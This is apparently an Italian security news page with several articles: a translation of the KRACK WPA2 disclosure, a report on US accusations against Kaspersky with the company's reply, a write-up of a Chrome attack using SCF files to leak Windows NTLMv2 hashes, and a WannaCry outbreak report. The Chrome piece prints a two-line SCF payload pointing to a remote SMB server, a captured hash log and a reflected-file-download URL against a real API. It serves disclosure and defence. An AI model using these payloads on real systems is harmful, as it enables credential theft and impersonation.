Se la vittima utilizza il protocollo di crittografia WPA-TKIP o GCMP, invece di AES-CCMP, l’impatto è particolarmente catastrofico. Contro questi protocolli di crittografia, il riutilizzo di nonce consente ad un avversario  non solo di de-crittografare, ma anche di creare e iniettare i pacchetti. Inoltre, poiché GCMP utilizza la stessa chiave di autenticazione in entrambe le direzioni di comunicazione e questa chiave può essere recuperata, la vulnerabilità è particolarmente facile da utilizzare. Si noti che il supporto per GCMP è attualmente in fase di roll-out sotto il nome di Wireless Gigabit (WiGig) e dovrebbe essere adottato da un tasso elevato di sistemi nei prossimi anni.

La direzione in cui i pacchetti possono essere decifrati dipende dalla handshake che viene attaccata. Ovvero, quando si attacca la 4 way handshake, possiamo decriptare (e creare) i pacchetti inviati dal client. Quando si attacca la handshake della transizione veloce BSS (FT), possiamo decriptare (e creare) i pacchetti inviati verso il client. Infine, la maggior parte degli attacchi consente anche la riproduzione di frame unicast, broadcast e multicast. Per ulteriori dettagli, vedere la sezione 6 del documento di ricerca .

Bisogna notare che gli attacchi non recuperano la password della rete Wi-Fi.

Kracks su Android e Linux

Il nostro attacco è particolarmente invadente contro la versione 2.4 e superiore di wpa_supplicant, un client Wi-Fi comunemente utilizzato su Linux. Qui, il client installerà una chiave di crittografia totalmente nulla, invece di reinstallare la chiave reale. Questa vulnerabilità sembra essere causata da una opzione nello standard Wi-Fi che suggerisce di cancellare la chiave di crittografia dalla memoria una volta installata per la prima volta. Quando il client riceve un messaggio di ritrasmissione del messaggio 3 della 4-way handshake reinstalla il codice di crittografia prima eliminato, installando in modo efficace un codice a zero. Poiché Android utilizza wpa_supplicant, Android 6.0 e superiori contengono anche questa vulnerabilità. Ciò rende banale intercettare e manipolare il traffico inviato da questi dispositivi Linux e Android . Si noti che attualmente Il 50% dei dispositivi Android è vulnerabile a questa variante eccezionalmente devastante del nostro attacco.

Common Vulnerabilities and Exposures (CVE)

  • CVE-2017-13077: Reinstallation of the pairwise encryption key (PTK-TK) in the 4-way handshake.
  • CVE-2017-13078: Reinstallation of the group key (GTK) in the 4-way handshake.
  • CVE-2017-13079: Reinstallation of the integrity group key (IGTK) in the 4-way handshake.
  • CVE-2017-13080: Reinstallation of the group key (GTK) in the group key handshake.
  • CVE-2017-13081: Reinstallation of the integrity group key (IGTK) in the group key handshake.
  • CVE-2017-13082: Accepting a retransmitted Fast BSS Transition (FT) Reassociation Request and reinstalling the pairwise encryption key (PTK-TK) while processing it.
  • CVE-2017-13084: Reinstallation of the STK key in the PeerKey handshake.
  • CVE-2017-13086: reinstallation of the Tunneled Direct-Link Setup (TDLS) PeerKey (TPK) key in the TDLS handshake.
  • CVE-2017-13087: reinstallation of the group key (GTK) when processing a Wireless Network Management (WNM) Sleep Mode Response frame.
  • CVE-2017-13088: reinstallation of the integrity group key (IGTK) when processing a Wireless Network Management (WNM) Sleep Mode Response frame.

Il Paper

Il documento di ricerca  è intitolato Attacchi chiave di reinstallazione: Forcing Nonce Reuse in WPA2 e sarà presentato alla conferenza Computer and Communications Security (CCS) mercoledì 1 novembre 2017 .Anche se questo documento è reso pubblico, è stato già presentato per la revisione il 19 maggio 2017. Dopo di che sono stati apportati solo piccoli cambiamenti. Di conseguenza, i risultati del documento sono noti già da diversi mesi. Nel frattempo, abbiamo trovato tecniche più facili per eseguire il nostro attacco Kracks. Con la nostra tecnica di attacco, ora, è banale sfruttare le vulnerabilità. In particolare ciò significa che attaccare MacOS e OpenBSD è significativamente più facile di quanto discusso nel documento.

Ora abbiamo bisogno di WPA3?

No, per fortuna i dispositivi possono essere patchati in modo compatibile con le versioni precedenti. Ciò significa che un client patchato può ancora comunicare con un punto di accesso non patchato (AP) e viceversa. In altre parole, un client patchato o un punto di accesso invia esattamente gli stessi messaggi di handshake come prima e nello stesso momento. Tuttavia, gli aggiornamenti della protezione assicurano che una chiave viene installata una sola volta, impedendo il nostro attacco. Quindi, bisogna aggiornare tutti i dispositivi una volta disponibili gli aggiornamenti di protezione. Infine, sebbene un client non patchato possa ancora connettersi a un AP patchato, e viceversa, sia il client che l’AP devono essere messi a punto per difendersi da tutti gli attacchi!

Devo cambiare la mia password Wi-Fi?

La modifica della password della rete Wi-Fi non impedisce (o attenua) l’attacco. Non è quindi necessario aggiornare la password della rete Wi-Fi. Al contrario, è necessario assicurarsi che tutti i dispositivi siano aggiornati o aggiornare anche il firmware del router. Tuttavia, dopo l’aggiornamento sia dei dispositivi client che del router, non è mai una brutta idea cambiare la password Wi-Fi.

 

Questo articolo è la traduzione di una parte del sito https://www.krackattacks.com/. Altre parti più tecniche come il Paper e i software saranno resi noti a breve.

Kaspersky è un pericolo per l’America. La risposta di Kaspersky Lab

0

La minaccia informatica della Russia verso gli Usa passa da Kaspersky. Queste le parole chiare e semplici del senatore Jeanne Shaheen . I software antivirus amplificano i pericoli di Kaspersky Lab. Il sig. Kaspersky potrebbe dire la verità quando afferma che il suo software antivirus non contiene una “backdoor”: codice che consenta di avere l’accesso a informazioni vulnerabili.

Ma un backdoor non è necessaria. Quando un utente installa il software Kaspersky Lab, l’azienda ottiene accesso a tutti gli angoli della rete del computer dell’utente, comprese tutte le applicazioni, i file e le email. E poiché i server di Kaspersky sono in Russia, i dati sensibili degli Stati Uniti vengono costantemente spostati in un paese ostile. Secondo le leggi russe e secondo la certificazione di Kaspersky Lab da parte della FSB, l’azienda è tenuta ad assistere l’agenzia spia nelle sue operazioni e la FSB può assegnare agenti di agenzia a lavorare in azienda. La legge russa prevede che i fornitori di servizi di telecomunicazione come Kaspersky Lab installino le apparecchiature di intercettazione di comunicazioni che consentano alla FSB di monitorare tutte le trasmissioni di dati di un’azienda.

Il fondatore dell’impresa, Eugene Kaspersky, si è laureato presso l’istituto di crittologia dell’elite del KGB, principale servizio di intelligence dell’Unione Sovietica, ed è stato un ingegnere software per l’intelligence militare sovietica. Kaspersky Lab ha compiuto passi falsi che rivelano la vera natura del suo lavoro con il Servizio di Sicurezza Federale della Russia o FSB, successore del KGB.

Il comitato dei servizi armati del Senato ha adottato a giugno le misure necessarie per vietare al Dipartimento della Difesa di utilizzare il software di Kaspersky Lab, per limitare ciò che la senatrice teme sia già una violazione enorme dei dati di sicurezza nazionale. Serve un’ampia legislazione sulla difesa che è ora allo studio dinanzi al Senato per vietare l’uso del software Kaspersky da parte di tutto il governo federale.

La risposta di Kaspersky Lab

“Considerato che Kaspersky Lab non ha legami non appropriati con alcun governo, l’azienda è amareggiata dalla decisione dello U.S. Department of Homeland Security (DHS) ma è anche grata per l’opportunità di poter fornire maggiori informazioni all’agenzia per confermare che queste accuse sono assolutamente infondate. Non è stata presentata pubblicamente alcuna prova credibile da alcuna persona od organizzazione, in quanto le accuse sono basate su false affermazioni e supposizioni errate, tra cui le dichiarazioni riguardanti regolamentazioni e policy russe con effetti sull’azienda. Kaspersky Lab ha sempre ammesso di fornire prodotti e servizi appropriati a governi di tutto il mondo per proteggere queste organizzazioni dalle cyber minacce, ma non ha legami amorali o affiliazioni con alcun governo, incluso quello russo.

“Inoltre, più dell’85% del fatturato dell’azienda proviene dall’esterno dei confini russi, un’ulteriore dimostrazione che una collaborazione non appropriata con qualunque governo sarebbe dannosa per il suo bilancio. Queste continue accuse ignorano, inoltre, che nei suoi 20 anni di storia nel settore della sicurezza IT, Kaspersky Lab ha sempre rispettato i più elevati standard di etica commerciale e sviluppato tecnologie affidabili.

“Per quanto riguarda le policy e le leggi russe male interpretate, si tratta di leggi e strumenti applicabili ad aziende del settore delle telecomunicazioni e Internet Service Provider (ISP) e, contrariamente a quanto inaccuratamente riportato, Kaspersky Lab non è soggetta a queste leggi o altri strumenti governativi, incluse le System of Operative-Investigative Measures (SORM) russe, in quanto l’azienda non offre servizi di comunicazione. Inoltre, è importante notare che le informazioni ricevute dall’azienda, così come il traffico, sono protette da crittografia, certificati digitali e altro ancora, come previsto dai requisiti legali e dai severi standard del settore.

“Kaspersky Lab non ha mai aiutato e mai aiuterà alcun governo al mondo in attività di cyber spionaggio o cyber attacco ed è sconcertante che un’azienda privata possa essere considerata colpevole fino a prova contraria a causa di questioni geopolitiche. L’azienda attende con impazienza di poter collaborare con il DHS, in quanto Kaspersky Lab crede fortemente che un’approfondita analisi dell’azienda confermerà che queste accuse sono infondate”

Inoltre, Eugene Kaspersky ha pubblicato un blogpost su Forbes in cui dichiara la propria opinione in merito alla vicenda: https://www.forbes.com/sites/eugenekaspersky/2017/09/13/separating-the-facts-from-the-assumptions/#230ca4a966f7

Vulnerabilità Chrome, possono rubare le password di Windows

Gli attacchi che rubano le credenziali di autenticazione usando il protocollo di condivisione SMB su Windows sono un problema presente da sempre, di solito limitato alle reti locali.

Una delle rare ricerche su attacchi Internet è stata recentemente presentata da Jonathan Brossard e Hormazd Billimoria alla Black Hat security conference nel 2015 [1] [2]. Tuttavia, non sono stati pubblicati attacchi alle credenziali tramite SMB nell’ultima decade, se non per Internet Explorer ed Edge.

Questo articolo descrive un attacco che può portare a furti di credenziali Windows attraverso Google Chrome, incluse tutte le versioni di Windows che lo supportano.

[miptheme_quote author=”” style=”text-center”]Shell] Command=2 IconFile=explorer.exe,3 [Taskbar] Command=ToggleDesktop[/miptheme_quote]

Il problema

Con la sua configurazione predefinita, Chrome Browser scarica automaticamente i file che ritiene sicuri senza richiedere all’utente un percorso di download, ma utilizzando invece quello predefinito. Da un punto di vista di sicurezza questa funzionalità non è un comportamento ideale, in quanto un utente dovrebbe essere consapevole di quello che scarica, scegliendo se procede oppure no. Tuttavia qualsiasi contenuto dannoso, per poter fare danni, necessita che un utente apra ed esegua il file manualmente. Ma cosa succede se il file scaricato non richiedesse interazioni utente per eseguire azioni dannose? Ci sono tipi di file che possono farlo?

Windows Explorer Shell Command file o SCF (.scf) è un tipo di file poco conosciuto che risale a Windows 98. La maggior parte degli utenti di Windows si è imbattuta in questo file su Windows 98/ME/NT/2000/XP dove viene utilizzato, principalmente, come un collegamento-scorciatoia sul desktop. È essenzialmente un file di testo con delle sezioni che determinano un comando da eseguire (limitato all’esecuzione di Explorer e al passaggio sul Desktop) e alla posizione di un file di icone. Come esempio, questo potrebbe essere il contenuto file SCF di Show Desktop:

Come nei file LNK di scorciatoia di Windows, la posizione dell’icona viene risolta automaticamente quando il file viene visualizzato in “Esplora Risorse”. L’impostazione di una posizione dell’icona in un server remoto SMB è un vettore di attacco noto che abusa della funzionalità di autenticazione automatica di Windows quando accede a servizi, come le condivisioni di file remoti. Ma qual è la differenza tra LNK e SCF dal punto di vista dell’attacco? Chrome permette i file LNK forzando un’estensione .download, ma non fa lo con i file SCF.

Il file SCF che può essere utilizzato per ingannare Windows in un tentativo di autenticazione a un server remoto SMB contiene solo due righe, come illustrato nell’esempio seguente:

[miptheme_quote author=”” style=”text-center”][Shell] IconFile=\\170.170.170.170\icon [/miptheme_quote]

Una volta scaricata, la richiesta viene attivata nel momento in cui la cartella di download viene aperta in Windows File Explorer per visualizzare il file, eliminarlo o lavorare con altri file (cosa abbastanza inevitabile). Non è necessario fare clic su file o aprirlo, Windows File Explorer prova automaticamente a recupero “l’icona”.

Il server remoto SMB impostato dall’attaccante è pronto a catturare il nome utente della vittima e il NTLMv2 password hash per il cracking online o inviare la connessione a un servizio esterno che accetta lo stesso tipo di autenticazione (ad esempio Microsoft Exchange) per simulare di essere la vittima senza mai conoscerne, in realtà, la password. Le informazioni acquisite potrebbero apparire come le seguenti:

[miptheme_quote author=”” style=”text-center”][*] SMB Captured – 2017-05-15 13:10:44 +0200 NTLMv2 Response Captured from 173.203.29.182:62521 – 173.203.29.182 USER:Bosko DOMAIN:Master OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:98daf39c3a253bbe4a289e7a746d4b24 NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e000000000200000000000 00000000000 Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fcdd201 ccf26d91cd9e326e00000000020000000000000000000000 [/miptheme_quote]

L’esempio precedente mostra una divulgazione del username utente, de dominio e de NTLMv2 password hash della vittima.

Vale la pena ricordare che i file SCF appariranno senza estensione in Windows Explorer, indipendentemente dalle impostazioni di file e cartelle. Di conseguenza, il file chiamato “picture.jpg.scf” apparirà in Esplora risorse come “picture.jpg”. Ciò mostra la natura oscura degli attacchi che utilizzano file SCF.

Impatto

Dichiarazione di password

Per gli utenti dei domini di Active Directory (corporate, governativi e altre reti), la divulgazione di password può avere diversi impatti che vanno dalla violazione della rete interna all’accesso a servizi esterni a disposizione di NTLM e alle violazioni in base al riutilizzo della password.

Per gli utenti Windows 8/10 che utilizzano un account Microsoft (MSA) anziché un account locale, la divulgazione delle password impatta su tutti i servizi Microsoft integrati con l’SSO di MSA come OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live e altri. Il problema comune della divulgazione delle password può portare a ulteriori violazioni di account non correlati a MSA, visto il fenomeno comune di utilizzare la stessa password per diversi servizi.

La fattibilità del cracking delle password è stata notevolmente migliorata negli ultimi anni con il cracking basato su GPU. Il benchmark NetNTLMv2 hashcat per una singola scheda Nvidia GTX 1080 è di circa 1600 MH/s, cioè 1,6 miliardi di hash al secondo. Per una password di 8 caratteri, quattro di queste GPU possono provare tutte le combinazioni di password, contenti caratteri speciali + alfanumerici, in meno di un giorno. Con le centinaia di milioni di password rubate in seguito alle numerose violazioni degli ultimi anni, la creazione di attacchi a dizionario può produrre risultati sorprendenti contro le password più complesse.

La situazione è ancora peggiore per i sistemi e le reti Windows XP in cui la compatibilità con NTLMv1 è stata abilitata esplicitamente. In questi casi, è possibile eseguire un attacco di downgrade che costringa il client ad autenticarsi con un hash/protocollo più debole (ad esempio NTLMv1 o addirittura LM) anziché NTLMv2. Ciò consente all’aggressore di catturare un hash che può essere crollato molte volte e più velocemente di un NTLMv2. Nel caso di LM questo avviene in pochi secondi utilizzando tabelle precompilate per invertire le funzioni di hash crittografiche (“tavole Rainbow”).

Attacchi SMB Relay

Le organizzazioni che consentono l’accesso remoto ai servizi come Microsoft Exchange (Outlook Anywhere) e consentono l’utilizzo di metodi di autenticazione NTLM possono essere vulnerabili agli attacchi di rete SMB, consentendo all’attaccante di impersonare la vittima, di accedere ai dati e ai sistemi senza dover crackare la password. Questo è stato dimostrato con successo da Jonathan Brossard alla Black Hat secutiry conference.

A determinate condizioni (in caso di esposizione esterna) un aggressore può anche essere in grado di trasmettere le credenziali a un controller di dominio sulla rete della vittima e di ottenere essenzialmente un accesso interno alla rete.

Gestione antivirus di SCF

Naturalmente, quando un browser non riesce ad avvisare o a ripulire i download da tipi i file potenzialmente pericolosi, si basa su delle soluzioni di sicurezza per farlo funzionare. Abbiamo testato diverse soluzioni antivirus di diversi fornitori per determinare se una soluzione contrassegnerebbe il file scaricato come pericoloso.

Tutte le soluzioni sperimentate non sono riuscite a contrassegnare i file come sospetti, che speriamo cambieremo presto. L’analisi dei file SCF sarebbe facile da implementare in quanto richiede solo l’ispezione del parametro “IconFile”, considerando che non esistono utilità legittime di SCF con le posizioni di icone remote.

Introducendo nuovi vettori di attacco

Sebbene l’uso dell’ingegneria sociale per attirare la vittima a visitare il sito web dell’attaccante, nonché la vulnerabilità di reindirizzamento e scripting su siti web attendibili, sono i metodi più comuni per fornire file dannosi, per questo attacco vorrei aggiungere un problema spesso trascurato e minore.

Download di file riflesso

Descritta per la prima volta da Oren Hafif, la vulnerabilità del Reflected File Download si verifica quando l’input di un utente specifico viene riflesso nella risposta del sito e scaricato dal browser dell’utente quando le condizioni sono soddisfatte. È stato inizialmente utilizzato come vettore di attacco per ingannare l’utente ad eseguire il codice malevolo (di solito da un file batch di Windows), in base alla fiducia dell’utente nel dominio vulnerabile.

Poiché il formato SCF è piuttosto semplice e il nostro attacco richiede solo due righe che possono essere precedute e seguite da (quasi) qualsiasi cosa, crea condizioni perfette per essere utilizzate con RFD.

La RFD è di solito rivolta agli endpoint RESTful API in quanto spesso utilizzano URL mapping permissivi, che consentono di impostare l’estensione del file nel percorso URL. Chrome non scarica tutti i tipi di contenuti tipici di risposta API così che questi devono forzati attraverso un attributo di download ( <a href = …. )  nei tag di collegamento. Tuttavia, ci sono eccezioni. Chrome utilizza il MIME/sniffing con il testo/contenuto e se la risposta contiene un carattere non stampabile verrà scaricato direttamente e automaticamente come file, a meno che la direttiva “nosniff” sia impostata.

Ciò può essere dimostrato sull’API della Banca Mondiale utilizzando il seguente URL:

http://api.worldbank.org/v2/country/indicator/iwantyourhash.scf?prefix=%0A[Shell]%0AIconFile=\\170.170.170.170\test%0Alol=%0B&format=jsonp

A causa del carattere non stampabile “ %0B “ Chrome scarica la risposta come file iwantyourhash.scf. Nel momento in cui viene aperta la directory di download che contiene il file, Windows cercherà di autenticare il file al server remoto SMB, divulgando gli hash di autenticazione della vittima. 

Raccomandazioni

Per disattivare i download automatici in Google Chrome, dovresti apportare le seguenti modifiche:

Impostazioni à Impostazioni avanzate à Controlla la richiesta dove salvare ciascun file prima di scaricare l’opzione.

L’approvazione manuale di ogni tentativo di download riduce significativamente il rischio di attacchi di furto di credenziali NTLMv2 utilizzando i file SCF.

Poiché i file SCF costituiscono ancora una minaccia, le misure da adottare dipendono dall’ambiente di rete degli utenti interessati e vanno dal semplice rafforzamento del livello dell’host, compresa la configurazione delle regole del firewall, all’applicazione di misure di protezione aggiuntive quali la firma dei pacchetti SMB e la protezione estesa. Con i primi due l’obiettivo è quello di impedire al traffico SMB di lasciare l’ambiente aziendale bloccando le porte che possono essere utilizzate per avviare una connessione su Internet con un server SMB potenzialmente dannoso. Quando possibile, il traffico SMB dovrebbe essere sempre limitato a reti private.

Conclusione

Attualmente, l’attaccante deve solo invogliare la vittima (utilizzando Google Chrome e Windows completamente aggiornati) a visitare il suo sito web per poter procedere e riutilizzare le credenziali di autenticazione della vittima. Anche se la vittima non è un utente privilegiato (ad esempio un amministratore), tale vulnerabilità potrebbe rappresentare una minaccia significativa per le grandi organizzazioni in quanto consente all’attaccante di fingersi membri dell’organizzazione, impersonandoli. Tale aggressore potrebbe riutilizzare immediatamente i privilegi acquisiti per accrescere ulteriormente l’accesso ed eseguire attacchi su altri utenti oppure ottenere accesso e controllo delle risorse IT.

La speranza è che Google Chrome venga aggiornato al più presto per risolvere questo problema

Inghilterra ed europa sotto attacco informatico con Wannacry ransomware

0

Un’ondata di infezioni ransomware ha colpito un ampio numero di ospedali del Regno Unito e si sta rapidamente muovendo in tutto il mondo.

Il cosiddetto ransomware Wanna Decryptor è attualmente in azione e si sta allargando a macchia d’olio in 74 paesi con più di 45.000 attacchi.

Il numero di infezioni in tutto il mondo è in rapida crescita, secondo Kaspersky il numero è destinato ad essere enormemente piu grande di ora in ora. Finora, alcuni dei paesi che sono stati colpiti sono la Gran Bretagna, Spagna, Russia, Taiwan, India, e l’Ucraina, secondo diversi rapporti in streaming in tutto il mondo il metodo di attacco ed infezione è sempre lo stesso.

Gli esperti di sicurezza dicono che l’attacco ransomware sta sfruttando la vulnerabilità critica chiamata Server Message Block (SMB) che è stata patchata da Microsoft il 14 marzo, MS17-010. L’exploit, alias ETERNALBLUE, che si ritiene derivare da un tool della NSA rubato mesi fa, ed utilizzato dal gruppo di pirati informatici Shadowbrokers.

“Non c’è nulla di paragonabile ad oggi. Si tratta di una massiccia operazione ransomware globale, il più grande ed efficace attacco mai fatto. Purtroppo, non tutte le organizzazioni sono protette contro ETERNALBLUE “, ha detto Kurt Baumgartner, principale ricercatore di sicurezza della Global Research and Analysis team per Kaspersky Lab.

Secondo un Avast anche l’azienda di telefomunicazioni Telefonica in Spagna e gli ospedali National Health Service (NHS) in Inghilterra sono stati colpiti.

Nel Regno Unito, un attacco su larga scala ha colpito un gran numero di ospedali in tutta la nazione, costringendo il personale medico di re-instradare i pazienti in emergenza ad altri ospedali della zona, secondo un rapporto del The Guardian.

Il malware ha colpito il centro NHS verso l’ora di pranzo, inizialmente si sono avuto problemi all’invio di posta elettronica, seguito da sistemi clinici e delle cartelle dei pazienti che non potevano piu essere lette. Questo è stato seguito da una richiesta di riscatto che appare sugli schermi dei computer dei dipendenti, chiedendo $ 300 in Bitcoin da versare entro tre giorni, altrimenti il ​​riscatto raddoppia. E se nessun pagamento è stato effettuato dopo sette giorni, i file sarebbero stati cancellati per sempre.

Il NHS ha emesso un avviso e ha confermato 40 centri medici colpiti.

Questo messaggio di riscatto è apparso anche in Spagna, dove il gigante delle telecomunicazioni Telefonica è stato preso di mira.

L’attacco sospetto è unico in quanto non è mirato ad un preciso qualsiasi settore o regione, e sta usando una forma particolarmente cattiva di malware in grado di muoversi attraverso una rete aziendale da un unico punto di ingresso“, spiega Simon Crosby, co-fondatore e chief technology officer di Bromo.

Come al solito, è sfruttando una vulnerabilità recentemente patchata che molti hanno omesso di sistemare,” dice. “Finché l’industria continua a giocare come il gatto col topo sulle proprie vulnerabilità, gli attaccanti avranno vita facile e avranno il modo di sfruttare attacchi di questo tipo sempre più su larga scala

Come WannaCry fa piangere

L’ETERNALBLUE è un exploit arrivato su Internet tramite il furto dei  Shadowbrokers il 14 aprile. Anche se Microsoft aveva rilasciato la patch  a marzo, molte organizzazioni non hanno ancora installato nessun aggiornamento.

La società di sicurezza hanno detto che WannaCry si avvia attraverso un’esecuzione di codice remoto SMBv2 in Microsoft Windows e quindi crittografa i dati con un file di estensione “.WCRY.” Quindi esegue uno strumento di decrittografia che è stato progettato per colpire gli utenti in diversi paesi con un riscatto tradotto nella lingua giusta per quel paese.

I ricercatori raccomandano l’installazione della patch rilasciata da Microsoft, che chiude la vulnerabilità SMB utilizzata nell’attacco WannaCry.

Per le organizzazioni ed aziende che dispongono di attrezzature con vecchi software, come ospedali, impianti di produzione, e le centrali elettriche, la distribuzione di una patch può essere complicata e rende dirompente un attacco questo può spiegare in parte come numero così largo di ospedali NHS sia stato vittima di WannaCry.

Aggiornamenti saranno apportati durante le prossime ore e giorni, seguici sui social e nella nostra newsletter